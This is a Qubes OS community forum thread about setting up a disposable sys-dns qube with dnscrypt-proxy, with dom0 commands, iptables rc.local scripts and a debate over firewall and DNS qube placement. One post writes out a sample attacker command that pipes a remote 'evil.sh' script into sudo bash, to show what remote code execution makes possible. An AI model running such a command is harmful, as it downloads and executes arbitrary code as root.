[guide] how-to setup a sys-dns qube

I’m not familiar with that guide, but I will take a look tomorrow.

In the meantime -

Qubes needs some mechanism to allow networking to work in a flexible
environment.
PR-QBS is a chain in the nat table which allows DNS traffic to
propagate up Qubes networking until it reaches sys-net, whatever that
networking looks like and however the user changes it
.
10.139.1.x are placeholders used in resolv.conf in the originating qube.
When the upstream qube sees DNS traffic to those addresses it forwards it
upstream.
This continues until it reaches sys-net, where the traffic is forwarded
to the actual DNS servers used by sys-net. Responses are returned down
the network to the originating qube.

You can interrupt this flow at any stage, by changing the rules in the
PR-QBS chain.

Unless someone else jumps in I’ll comment tomorrow.

Of course.
But, it probably is already, because most use of iptables now is not
iptables-legacy but iptables-nft (nf_tables). It is a bridge from
familiar iptables commands to the nftables api.
Check what you are using with iptables -V

Probably. Once you are clear on what is wrong, perhaps you can provide
the update.

I never presume to speak for the Qubes team. When I comment in the Forum or in the mailing lists I speak for myself.
1 Like

I’m not familiar with that guide, but I will take a look tomorrow.

Great! Thank you!

PR-QBS is a chain in the nat table which allows DNS traffic to
propagate up Qubes networking until it reaches sys-net, whatever that
networking looks like and however the user changes it
.

Where did you learn about all this? How can I educate myself?

10.139.1.x are placeholders used in resolv.conf in the originating qube.

But how do those relate to the actual IP addresses of the qubes as seen in Qubes manager? The later are quite different.

This continues until it reaches sys-net, where the traffic is forwarded
to the actual DNS servers used by sys-net. Responses are returned down
the network to the originating qube.

You can interrupt this flow at any stage, by changing the rules in the
PR-QBS chain.

Doesn’t that make sys-firewall, being a/the dedicated firewall, the proper place to do that? What is the benefit of having a whole separate sys-dns qube just for DNS compared to simply installing dnscrypt-proxy in sys-firewall (or sys-net) itself?

I may be missing something but considering minimalism and simplicity as a security principle, as well as the (always) limited system resources, is it not an overkill to have whole 3 VMs chained one after another just to connect to the Internet?

Check what you are using with iptables -V

As I mentioned, the command iptables does not exist in fedora-36-minimal. I have no idea which package to install and in which particular qube in order to have it in sys-dns. Assuming that the minimal template was created by experts with the intention to be minimal, I suppose it is a deliberate choice not to include iptables in it. IOW, I wonder if it is appropriate to even consider installing anything additional to the intentionally minimal system. So, this is kind of confusing. I will wait for your clarifications.

Once you are clear on what is wrong, perhaps you can provide the update.

Of course, I would be glad to help if I can. However, although I run dnscrypt-proxy on my (non Qubes OS) Linux systems, I don’t consider myself a network expert. Perhaps that would better be done by someone who has deeper knowledge about Qubes OS and could answer questions which may arise later. It may be best to simply have dnscrypt-proxy “out of the box” in Qubes OS as default DNS system for the non-anonymous networking. Then, one can simply customize the config files in /etc/dnscrypt-proxy. I don’t know if that has been suggested or considered but IMO it would fit quite well the overall philosophy of Qubes OS.

Looking forward to your further comments.
Thank you.

Dear @unman,

Did you have the time to look into this?
I really hope you can help.
Thanks.

After finding some problems, I made it work.
I am working on an updated guide. Coming soon.

2 Likes

Looking forward to it.

The firewall documentation says:

“Qubes does not support running any networking services (e.g. VPN, local DNS server, IPS, …) directly in a qube that is used to run the Qubes firewall service (usually sys-firewall) for good reasons. In particular, if you want to ensure proper functioning of the Qubes firewall, you should not tinker with iptables or nftables rules in such qubes.”

which sounds confusing because:

  • sys-firewall is not a service, it is a VM
  • the “good reasons” have not been explicitly clarified
  • it seems impossible “not to tinker” with iptables or nftables rules if one wants to configure a qube running a DNS because those rules are necessary for proper packet routing

IOW, even if we deploy the network infrastructure proposed in the doc:

sys-net <--> sys-firewall-1 <--> network service qube <--> sys-firewall-2 <--> [client qubes]

we still need firewall rules in the network service qube (which will run the dnscrypt-proxy service). Does this remove the need for sys-firewall-2 which only direct DNS traffic to the network service qube? The doc says:

"The sys-firewall-2 proxy ensures that:

  1. Firewall changes done in the network service qube cannot render the Qubes firewall ineffective.
  2. Changes to the Qubes firewall by the Qubes maintainers cannot lead to unwanted information leakage in combination with user rules deployed in the network service qube.
  3. A compromise of the network service qube does not compromise the Qubes firewall."

Re. 1: Even without sys-firewall-2, the Qubes firewall (sys-firewall-1) is still separate from the network service qube. So, it is not clear how exactly sys-firewall-2 ensures anything in regards to that.

Re. 2: That highly depends on the actual changes and the actual user rules. Example: Suppose the developers (deliberately or by mistake) switch the default policy of the FORWARD chain from DROP to ACCEPT. Then maybe the network service qube (not having any firewall rules, as both advised and impossible) can forward traffic through sys-firewall-1 and sys-firewall-2 can do nothing about it.

Re. 3: Just like in 1, sys-firewall-2 has nothing to do with that.

Regardless of the above confusion in documentation, one can assume that “good reasons” means improved security through additional isolation of firewall stuff from DNS. Having a second firewall between the network service qube and the client cubes can reduce the possibility of leakage from client qubes to the Internet. It also creates another possibility (more on that below).

The other confusion is that Qubes OS still uses the legacy iptables, making us dependent on it through the package qubes-core-agent-networking. To make things even more complicated, Qubes OS mixes that with nftables, making the whole thing very difficult to understand and manage. In my trials, I found it sufficient to use only iptables rules, as explained below.

So, the goal is to deploy the following network infrastructure:

[network uplink]
 └── sys-net
     └── sys-firewall
         ├── sys-dns
         │   └── sys-wall
         │       ├── qube-1
         │       ├── qube-2
         │       ├── [...]
         │       └── qube-n
         └── sys-whonix
             └── [anonymized-qubes]

Preparation

Install fedora-37-minimal template and update it.

In dom0:

sudo qubes-dom0-update qubes-template-fedora-37-minimal
sudo qubesctl --show-output --skip-dom0 --targets fedora-37-minimal state.sls update.qubes-vm

Create a minimal disposable sys-dns qube:

Preserve the original template as an untouched starting point for other qubes.

In dom0:

qvm-shutdown fedora-37-minimal
qvm-clone fedora-37-minimal f37-m-net

Install software in the cloned template

In dom0:

qvm-run -u root f37-m-net xterm

As per docs, qubes-core-agent-networking seems necessary for anything network related:

In f37-m-net:

dnf install qubes-core-agent-networking dnscrypt-proxy vim-minimal
systemctl disable dnscrypt-proxy

Customize files in /etc/dnscrypt-proxy.

Create user and group, so the service does not run as root:

groupadd --system dnscrypt
useradd --system --home /run/dnscrypt-proxy --shell /bin/false --gid dnscrypt dnscrypt
usermod --lock dnscrypt

This directory should be the same as the one used in subsections of section [sources] in /etc/dnscrypt-proxy/dnscrypt-proxy.toml. I am using a subdir of /run in order to hopefully have cache in RAM (/run is a tmpfs mount):

mkdir -p /run/dnscrypt-proxy

Set proper ownership and permissions:

chown dnscrypt:dnscrypt /run/dnscrypt-proxy
chmod go-rwx /run/dnscrypt-proxy
chown -R dnscrypt:dnscrypt /etc/dnscrypt-proxy
chmod -R go-rwx /etc/dnscrypt-proxy

Use the same user in /etc/dnscrypt-proxy/dnscrypt-proxy.toml:

user_name = 'dnscrypt'

Create a disposable DNS template:

In dom0:

qvm-shutdown f37-m-net
qvm-create -C AppVM --template f37-m-net --label red f37-m-dns-dvm
qvm-prefs f37-m-dns-dvm template_for_dispvms True
qvm-create -C DispVM --template f37-m-dns-dvm --label orange sys-dns
qvm-run -u root f37-m-dns-dvm xterm

In f37-m-dns-dvm move the config files to /rw dir to make it specific to the disposable qube only:

mv /etc/dnscrypt-proxy /rw/

In /rw/config/rc.local:

#!/bin/sh

# This script will be executed at every VM startup, you can place your own
# custom commands here. This includes overriding some configuration in /etc,
# starting services etc.

ipt='/usr/sbin/iptables'

# allow redirects to localhost
/usr/sbin/sysctl -w net.ipv4.conf.all.route_localnet=1
"${ipt}" -I INPUT -i vif+ -p tcp --dport 53 -d 127.0.0.1 -j ACCEPT
"${ipt}" -I INPUT -i vif+ -p udp --dport 53 -d 127.0.0.1 -j ACCEPT

# block connections to other DNS servers
"${ipt}" -I FORWARD -i vif+ -p tcp --dport 53 ! -d 127.0.0.1 -j DROP
"${ipt}" -I FORWARD -i vif+ -p udp --dport 53 ! -d 127.0.0.1 -j DROP

"${ipt}" -t nat -F PR-QBS
"${ipt}" -t nat -A PR-QBS -p udp --dport 53 -j DNAT --to-destination 127.0.0.1
"${ipt}" -t nat -A PR-QBS -p tcp --dport 53 -j DNAT --to-destination 127.0.0.1

echo 'nameserver 127.0.0.1' > /etc/resolv.conf
# https://github.com/DNSCrypt/dnscrypt-proxy/wiki/Installation-linux
# https://wiki.archlinux.org/title/Dnscrypt-proxy#Enable_EDNS0
echo 'options edns0' >> /etc/resolv.conf

ln -s /rw/dnscrypt-proxy /etc/dnscrypt-proxy
/usr/bin/systemctl start dnscrypt-proxy.service

In dom0:

qvm-run -u root f37-m-net xterm

In f37-m-net:

rm -rf /etc/dnscrypt-proxy

Test if the service works:

In dom0:

qvm-shutdown f37-m-dns-dvm f37-m-net
qvm-run -u root sys-dns xterm

In sys-dns:

systemctl status dnscrypt-proxy

The above should show that the service is active and running.

Optional (for more details):

systemctl restart dnscrypt-proxy; journalctl --output=short-monotonic -f -u dnscrypt-proxy

after completion of the start process the journal shows something like:

[...]
[ 5611.615623] sys-dns dnscrypt-proxy[2951]: [2023-01-22 21:50:02] [NOTICE] -   519ms dnswarden-uncensor-dc-swiss
[ 5611.615696] sys-dns dnscrypt-proxy[2951]: [2023-01-22 21:50:02] [NOTICE] -   584ms pryv8boi
[ 5611.615780] sys-dns dnscrypt-proxy[2951]: [2023-01-22 21:50:02] [NOTICE] -   760ms altername
[ 5611.615845] sys-dns dnscrypt-proxy[2951]: [2023-01-22 21:50:02] [NOTICE] Server with the lowest initial latency: scaleway-ams (rtt: 89ms)
[ 5611.615944] sys-dns dnscrypt-proxy[2951]: [2023-01-22 21:50:02] [NOTICE] dnscrypt-proxy is ready - live servers: 33

List processes running as user dnscrypt:

In sys-dns:

ps -U dnscrypt -u dnscrypt u
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
dnscrypt    2951  0.2  2.5 1301200 100776 ?      Ssl  21:49   0:01 /usr/bin/dnscrypt-proxy -config /etc/dnscrypt-proxy/dnscrypt-proxy.toml -child

Create and configure the new minimal disposable firewall sys-wall:

We have already installed qubes-core-agent-networking in f37-m-net, so we simply use that template.

qvm-create -C AppVM --template f37-m-net --label red f37-m-firewall-dvm
qvm-prefs f37-m-firewall-dvm template_for_dispvms True
qvm-create -C DispVM --template f37-m-firewall-dvm --label green sys-wall

Configure the network structure based on the initial diagram.

In dom0:

qvm-prefs sys-dns netvm sys-firewall
qvm-prefs sys-dns autostart true
qvm-prefs sys-dns provides_network true
qvm-prefs sys-wall netvm sys-dns
qvm-prefs sys-wall provides_network true

Configure the firewall rules:

In dom0:

qvm-run -u root f37-m-firewall-dvm xterm

In f37-m-firewall-dvm edit /rw/config/rc.local

#!/bin/sh

# This script will be executed at every VM startup, you can place your own
# custom commands here. This includes overriding some configuration in /etc,
# starting services etc.

ipt='/usr/sbin/iptables'

# redirect all dns-requests to sys-dns
"${ipt}" -t nat -F PR-QBS
"${ipt}" -t nat -A PR-QBS -d 10.139.1.1/32 -p udp --dport 53 -j DNAT --to-destination 10.138.26.87
"${ipt}" -t nat -A PR-QBS -d 10.139.1.1/32 -p tcp --dport 53 -j DNAT --to-destination 10.138.26.87
"${ipt}" -t nat -A PR-QBS -d 10.139.1.2/32 -p udp --dport 53 -j DNAT --to-destination 10.138.26.87
"${ipt}" -t nat -A PR-QBS -d 10.139.1.2/32 -p tcp --dport 53 -j DNAT --to-destination 10.138.26.87

# block connections to other DNS servers
"${ipt}" -t nat -A PR-QBS -p udp --dport 53 -j DNAT --to-destination 0.0.0.0
"${ipt}" -t nat -A PR-QBS -p tcp --dport 53 -j DNAT --to-destination 0.0.0.0

Set sys-wall as NetVM for a qube and test in a terminal in that qube:

[user@disp1463 ~]$ host gnu.org
gnu.org has address 209.51.188.116
gnu.org has IPv6 address 2001:470:142:5::116
gnu.org mail is handled by 10 eggs.gnu.org.
[user@disp1463 ~]$ host google-analytics.com
google-analytics.com host information "This query has been locally blocked" "by dnscrypt-proxy"
google-analytics.com host information "This query has been locally blocked" "by dnscrypt-proxy"
google-analytics.com host information "This query has been locally blocked" "by dnscrypt-proxy"

That’s because my blocked_names_file has a line blocking the last host. This confirms the configuration is working.

Test if it is possible to circumvent the blockage and use another DNS server (8.8.8.8):

[user@disp1463 ~]$ host google-analytics.com 8.8.8.8
;; connection timed out; no servers could be reached

It seems sys-wall woks as expected too.

Finally, set sys-wall as NetVM for all qubes which should use DNScrypt.

TODO:

  • DNScrypt-proxy allows name (un)blocking. Using an dedicated combination of sys-dns and sys-wall for a qube it is possible to block everything and allow only one domain (or a set of them), e.g. *.mybank.com. With proper scripting and UI, this may be a possible solution to a problem discussed long time ago.

  • Another thing is getting rid of iptables and using nftables. This seems something developers need to do in relation to qubes-core-agent-networking. Has it been reported and/or considered?

  • Ideally, dnscrypt-proxy should be integrated in Qubes OS out of the box.

Comments, suggestions and corrections are very welcome. I don’t pretend to be an expert, just sharing what worked for me.

P.S. Sorry for the huge delay. I had some troubles and this whole thing took longer than expected. Still, better late than never, I hope.

6 Likes

@qubist Thank you for sharing, it works beautifully!

What memory parameters you can suggest in order to use the limited RAM more frugally?

I don’t understand why do we need sys-wall when you yourself said that sys-firewall-2 makes no sense.

Walk me through these lines please.
Do I understand it correctly that 10.139.1.1/32 and 10.139.1.2/32 are addresses of the qubes dns server? If so, why there are two of them?

Is assigned by qubes dhcp server sys-dns ip address always static?

What does PR-QBS chain exactly do? Does it forward all packets on port 53 in all qubes to the 10.139.1.1-10.139.1.2? And in your example it further redirects them to sys-dns ip?


wtf, why is unman’s post listed as my parent post?
well, whatever, he has some interesting things in his post related to my question

When the upstream qube sees DNS traffic to those addresses it forwards it upstream.

This is all fine and dandy, but how does this works exactly?
In my firewall vm I have the following iptables configuration:

  1. filter
Chain INPUT (policy DROP 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination         
    0     0 DROP       all  --  any    any     anywhere             anywhere             state INVALID
    0     0 DROP       udp  --  vif+   any     anywhere             anywhere             udp dpt:bootpc
   16  1582 ACCEPT     all  --  any    any     anywhere             anywhere             ctstate RELATED,ESTABLISHED
    0     0 ACCEPT     icmp --  vif+   any     anywhere             anywhere            
    4   208 ACCEPT     all  --  lo     any     anywhere             anywhere            
    0     0 REJECT     all  --  vif+   any     anywhere             anywhere             reject-with icmp-host-prohibited
    0     0 DROP       all  --  any    any     anywhere             anywhere            

Chain FORWARD (policy DROP 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination         
    0     0 DROP       all  --  any    any     anywhere             anywhere             state INVALID
2241K 2453M ACCEPT     all  --  any    any     anywhere             anywhere             ctstate RELATED,ESTABLISHED
  653  160K QBS-FORWARD  all  --  any    any     anywhere             anywhere            
    0     0 DROP       all  --  vif+   vif+    anywhere             anywhere            
  653  160K ACCEPT     all  --  vif+   any     anywhere             anywhere            
    0     0 DROP       all  --  any    any     anywhere             anywhere            

Chain OUTPUT (policy ACCEPT 20 packets, 1202 bytes)
 pkts bytes target     prot opt in     out     source               destination         

Chain QBS-FORWARD (1 references)
 pkts bytes target     prot opt in     out     source               destination         

  1. mangle
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination         

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination         

Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination         

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination         

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination         
2244K 2456M QBS-POSTROUTING  all  --  any    any     anywhere             anywhere            

Chain QBS-POSTROUTING (1 references)
 pkts bytes target     prot opt in     out     source               destination         

  1. nat
Chain PREROUTING (policy ACCEPT 115 packets, 79516 bytes)
 pkts bytes target     prot opt in     out     source               destination         
  415  102K PR-QBS     all  --  any    any     anywhere             anywhere            
  115 79516 PR-QBS-SERVICES  all  --  any    any     anywhere             anywhere            

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination         

Chain OUTPUT (policy ACCEPT 16 packets, 1042 bytes)
 pkts bytes target     prot opt in     out     source               destination         

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination         
    0     0 ACCEPT     all  --  any    vif+    anywhere             anywhere            
    4   208 ACCEPT     all  --  any    lo      anywhere             anywhere            
  425  103K MASQUERADE  all  --  any    any     anywhere             anywhere            

Chain PR-QBS (1 references)
 pkts bytes target     prot opt in     out     source               destination         
  300 22677 DNAT       udp  --  any    any     anywhere             10.139.1.1           udp dpt:domain to:10.139.1.1
    0     0 DNAT       tcp  --  any    any     anywhere             10.139.1.1           tcp dpt:domain to:10.139.1.1
    0     0 DNAT       udp  --  any    any     anywhere             10.139.1.2           udp dpt:domain to:10.139.1.2
    0     0 DNAT       tcp  --  any    any     anywhere             10.139.1.2           tcp dpt:domain to:10.139.1.2

Chain PR-QBS-SERVICES (1 references)
 pkts bytes target     prot opt in     out     source               destination         

  1. raw
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination         
    0     0 DROP       all  --  !vif+  any     10.137.0.36          anywhere            
    0     0 DROP       all  --  vif7.0 any    !10.137.0.36          anywhere            
    0     0 DROP       all  --  !vif+  any     10.138.16.52         anywhere            
    0     0 DROP       all  --  vif6.0 any    !10.138.16.52         anywhere            
2245K 2457M QBS-PREROUTING  all  --  any    any     anywhere             anywhere            

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination         

Chain QBS-PREROUTING (1 references)
 pkts bytes target     prot opt in     out     source               destination         

  1. security
Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination         

Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination         

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination         

The only substantial part related to PR-QBS is in the nat table and it is just a tautology that forwards to 10.139.1.1 if the destination is 10.139.1.1

I don’t see how it “forwards it upstream”

@qubean

What memory parameters you can suggest in order to use the limited RAM more frugally?

The minimum which doesn’t cause swapping.

The following solution for /rw/config/rc.local is a lot easier than my suggestion above and survives hotplugging of sys-dns:

#!/bin/sh

# allow redirects to localhost
/usr/sbin/sysctl -w net.ipv4.conf.all.route_localnet=1
/usr/sbin/iptables -I INPUT -i vif+ -p tcp --dport 53 -d 127.0.0.1 -j ACCEPT
/usr/sbin/iptables -I INPUT -i vif+ -p udp --dport 53 -d 127.0.0.1 -j ACCEPT

# there is no place like 127.0.0.1
echo "nameserver 127.0.0.1" > /etc/resolv.conf
echo "nameserver 127.0.0.1" >> /etc/resolv.conf

# enable hotplugging survival
qubesdb-write /qubes-primary-dns 127.0.0.1
qubesdb-write /qubes-secondary-dns 127.0.0.1

# rerun setup of DNAT rules
/usr/lib/qubes/init/network-proxy-setup.sh

# start dnscrypt-proxy
/usr/bin/systemctl start dnscrypt-proxy.service

As written above dnscrypt-proxy has to be installed in sys-dns’ template and at least /etc/dnscrypt-proxy/dnscrypt-proxy.toml has to be set up to your needs inside of the template. As you don’t want the service running in other VMs I suggest to disable dnscrypt-proxy.service in the template.

A separate template is not necessary. From my point of view sys-dns should be placed between sys-firewall and sys-net. One could argue to run the service in sys-net as it is the VM with the biggest attack surface anyway.

From my point of view sys-dns should be placed between sys-firewall and sys-net.

How is sys-dns protected then?

One could argue to run the service in sys-net as it is the VM with the biggest attack surface anyway.

Why would anyone want to put more data/services on the biggest attack surface, thus increasing it?

It is not. However, I am not sure what you mean by “protected”. AFAIK “protection” is offered by AV-solutions. Often they even claim to protect you “military-grade”.

Because you have to put the service somewhere if you want to run dnscrypt-proxy yourself.

Talking about attack surface: every VM has its own attack surface. I assume the biggest attack surface are presented by the apps (webbrowser, email-client, office, instant messenger, asf.) running in AppVMs.

The Qubes-OS-way is to confine these or in this case dnscrypt-proxy.service with Xen in separate VMs, i.e. a disposable sys-dns. You could plug stuff like this

appVM <---> sys-firewall <---> sys-dns <---> sys-net <---> uplink

or you could plug your VMs like this

appVM <---> sys-firewall <---> sys-net <---> uplink
                | *
             sys-dns

or like this

appVM <---> sys-firewall <---> sys-net <---> uplink
                                  | *
                               sys-dns

instead, and

*) enforce strict firewall rules there.

You could also use a pi-hole on a RasPi in your local net and tell your router to point all DNS requests there.

@ckN6QwSZ

It is not.

Why do you suggest such setup then?

However, I am not sure what you mean by “protected”.

The way a firewall protects.

AFAIK “protection” is offered by AV-solutions.

What is AV?

Because you have to put the service somewhere if you want to run dnscrypt-proxy yourself.

The question is why “somewhere” should be the biggest attack surface.

Talking about attack surface: every VM has its own attack surface. I assume the biggest attack surface are presented by the apps (webbrowser, email-client, office, instant messenger, asf.) running in AppVMs.

Previously you said “sys-net is the VM with the biggest attack surface anyway.” Now you are saying other things have the biggest attack surface. I wonder what you are trying to convey.

The Qubes-OS-way is to confine these or in this case dnscrypt-proxy.service with Xen in separate VMs, i.e. a disposable sys-dns. You could plug stuff like this […]

Your examples contradict what the docs recommend (which I hoped is the Qubes OS way). Are the docs wrong? Or are you simply discussing what is possible (“could”) rather than what is better from security perspective (“should”)?

Let me shortly clarify your confusion with the doc:

The Qubes firewall is always implemented in the next downstream (or upstream depending on your notion of that word) VM/Qube regardless of the VM name. The name of a VM doesn’t imply any functionality for Qubes OS.

So if you have
sys-net <–> sys-firewall-1 <–> network service qube <–> [client qubes]
(i.e. without sys-firewall-2 which you deem unnecessary)
the rules for [client qubes] are enforced in your network service qube.
That is the reason why the doc tells you to not mess with the firewall rules in firewall service qubes (in this case the network service qube) and guides you towards the architecture with sys-firewall-2.
sys-firewall-1 only enforces rules for the network service qube and not for any [client qubes] as you seem to think.

IIRC I wrote the doc back in the days after I had had some discussion with Marek about exactly that topic. Feel free to update it though if you find more clear words.

Also, IIRC nftables supersedes iptables, i.e. there’s no duplicate use. You’ll notice that every iptables rule has a corresponding nftables rule simply because the kernel only keeps the nftables rules and translates legacy iptables instructions to nftables.

Fyi: Some time ago I published [1] to simplify the setup process of a DNS VM.

[1] GitHub - 3hhh/qubes-dns: DNS VM helper scripts

2 Likes

I’m not suggesting an all-in-one solution. Security is a process, not a state. In Qubes-OS xen is isolating VMs from each other. However, in every VM where you can do a

curl -s http://google.com | less

sucessfully, an attacker could do a

curl -sk https://somewhere.org/evil.sh | sudo /bin/bash

given he got RCE (remote code execution). As port 443 and 80 on remote hosts are reachable an attacker can use either one for a callback.

There are different kinds of firewalls. sys-firewall does not protect against a reverse shell or any other malicious code execution as shown (easily reproducible) above. On the contrary it provides connectivity.

Antivirus like Microsoft Defender.

Decide yourself. If I understand @tripleh correctly, he suggests to place your dns resolver inside an appVM of your choice and do not mess with iptables if you don’t know what you are doing.

Me, too! :wink:

@tripleh

Thanks for stepping in.

I don’t deem sys-firewall-2 unnecessary. As you can see, I do use in my setup (sys-wall).

The doc is confusing not because it suggests the particular infrastructure but because it does not clarify how things actually work - what your current explanation aims to compensate for.

After spending some months with Qubes OS, I notice this common pattern in the docs - the beginner and advanced level are somewhat disconnected, making it difficult for (an interested) one to go deeper.

sys-firewall-1 only enforces rules for the network service qube and not for any [client qubes] as you seem to think.

My understanding is that a firewall enforces rules for network packets, not for machines (be those physical or virtual). IOW, if sys-firewall-1 blocks all outgoing traffic on TCP port 1234 through forward table, [client qubes] will be affected too. Please correct me if I am wrong.

IIRC I wrote the doc back in the days after I had had some discussion with Marek about exactly that topic. Feel free to update it though if you find more clear words.

I am neither a network expert, nor a Qubes OS expert.

Also, IIRC nftables supersedes iptables, i.e. there’s no duplicate use. You’ll notice that every iptables rule has a corresponding nftables rule simply because the kernel only keeps the nftables rules and translates legacy iptables instructions to nftables.

That is true only if if iptables-nft is installed. In a minimal Fedora 37 template it is not installed and qubes-core-agent-networking does not install it as a dependency. The result can be confusing. You see: another thing that needs documentation.

I have no idea why legacy rules and their translation are necessary. IMO, iptables has to go and only nftables should be used. I don’t know if anyone is working in that direction.

Thanks for the link too, I will have a look.

@ckN6QwSZ

Security is a process, not a state.

That doesn’t mean we should start from a known unprotected state.

In Qubes-OS xen is isolating VMs from each other. However, in every VM where you can do a […]

Only if the VM is connected to the Internet and has curl installed. But that has nothing to do with sys-dns. :slight_smile:

from me: “sys-firewall-1 only enforces rules for the network service qube and not for any [client qubes] as you seem to think.”

from you: “My understanding is that a firewall enforces rules for network packets, not for machines (be those physical or virtual). IOW, if sys-firewall-1 blocks all outgoing traffic on TCP port 1234 through forward table, [client qubes] will be affected too. Please correct me if I am wrong.”
(IIRC quoting in replying via e-mail didn’t work on the forum, but it may be fixed by now, idk.)

Partially true:

  1. Most firewall rules involve hosts. :wink:
  2. Assuming the doc network infrastructure Qubes OS uses nft to dynamically create rules for [client qubes] inside sys-firewall-2. If you don’t have sys-firewall-2 it’ll use the [network service qube] and so on. However if you then do strange things in there, the Qubes OS firewall may not be effective. Qubes firewall rules for the [network service qube] are implemented by Qubes OS inside sys-firewall-1 (= the next downstream/upstream qube from [network service qube] perspective).
  3. If [network service qube] is e.g. used for VPN, there won’t be any relevant destination IP to block anymore in sys-firwall-1 as all you see there is traffic to the VPN server. You’ll need sys-firewall-2 to block anything relevant for [client qubes]. Btw if you wanted to allow only the VPN server destination IPs from the [network service = VPN qube], you’d still need sys-firewall-1 and configure those on the [network service qube] Qubes firewall.

from me: “Also, IIRC nftables supersedes iptables, i.e. there’s no duplicate use. You’ll notice that every iptables rule has a corresponding nftables rule simply because the kernel only keeps the nftables rules and translates legacy iptables instructions to nftables.”

from you: “That is true only if if iptables-nft is installed. In a minimal Fedora 37 template it is not installed and qubes-core-agent-networking does not install it as a dependency. The result can be confusing. You see: another thing that needs documentation.”

True.

“I have no idea why legacy rules and their translation are necessary. IMO, iptables has to go and only nftables should be used. I don’t know if anyone is working in that direction.”

Qubes 4.2 only uses nft.

(IIRC quoting in replying via e-mail didn’t work on the forum, but it may be fixed by now, idk.)

I notice that “>” prefixed lines appear indented in the forum, so it seems to work fine. I use that when I reply by email.

  1. Assuming the doc network infrastructure Qubes OS uses nft to dynamically create rules for [client qubes] inside sys-firewall-2. If you don’t have sys-firewall-2 it’ll use the [network service qube] and so on.

If that is to be documented, it should come with a reminder that it applies only if the upstream qube (be that sys-firewall-2 or the [network service qube]) has qubes-core-agent-networking installed.

Qubes firewall rules for the [network service qube] are implemented by Qubes OS inside sys-firewall-1 (= the next downstream/upstream qube from [network service qube] perspective).

I suppose you mean the rules introduced through [network service qube]'s Settings tab (or through qvm-firewall). As shown in both guides above, we cannot possibly avoid using firewall rules in the [network service qube] itself. Or can we?

  1. If [network service qube] is e.g. used for VPN […]

Currently, I am looking for a way to restrict a Whonix-based qube to access only specific hosts(s) through Tor. Is that documented/discussed somewhere? Or can you suggest how to do it?

To avoid off-topic, I am opening another thread for this, and I hope you can comment there:

Qubes 4.2 only uses nft.

Excellent.

Good point. If an attacker wants to exploit dnscrypt-proxy that would also require quite a few edge cases, like an existing vulnerability and exploit, some manipulated dns-answer from a pwned dns resolver and so forth. curl, nc asf. would come handy as well.

What I’m trying to say: if one wants to use dnscrypt-proxy one has to put the service somewhere. You could put it in your AppVM, but if all your networking VMs are supposed to use it you might want to put it somewhere upstream, like in sys-firewall, sys-net, on your router or a raspi in your local net. Or a sys-dns.

Good to know. As long as network-proxy-setup.sh hasn’t been altered profoundly

in rc.local should still work fine in QubesOS 4.2rc1, but I haven’t time to try it.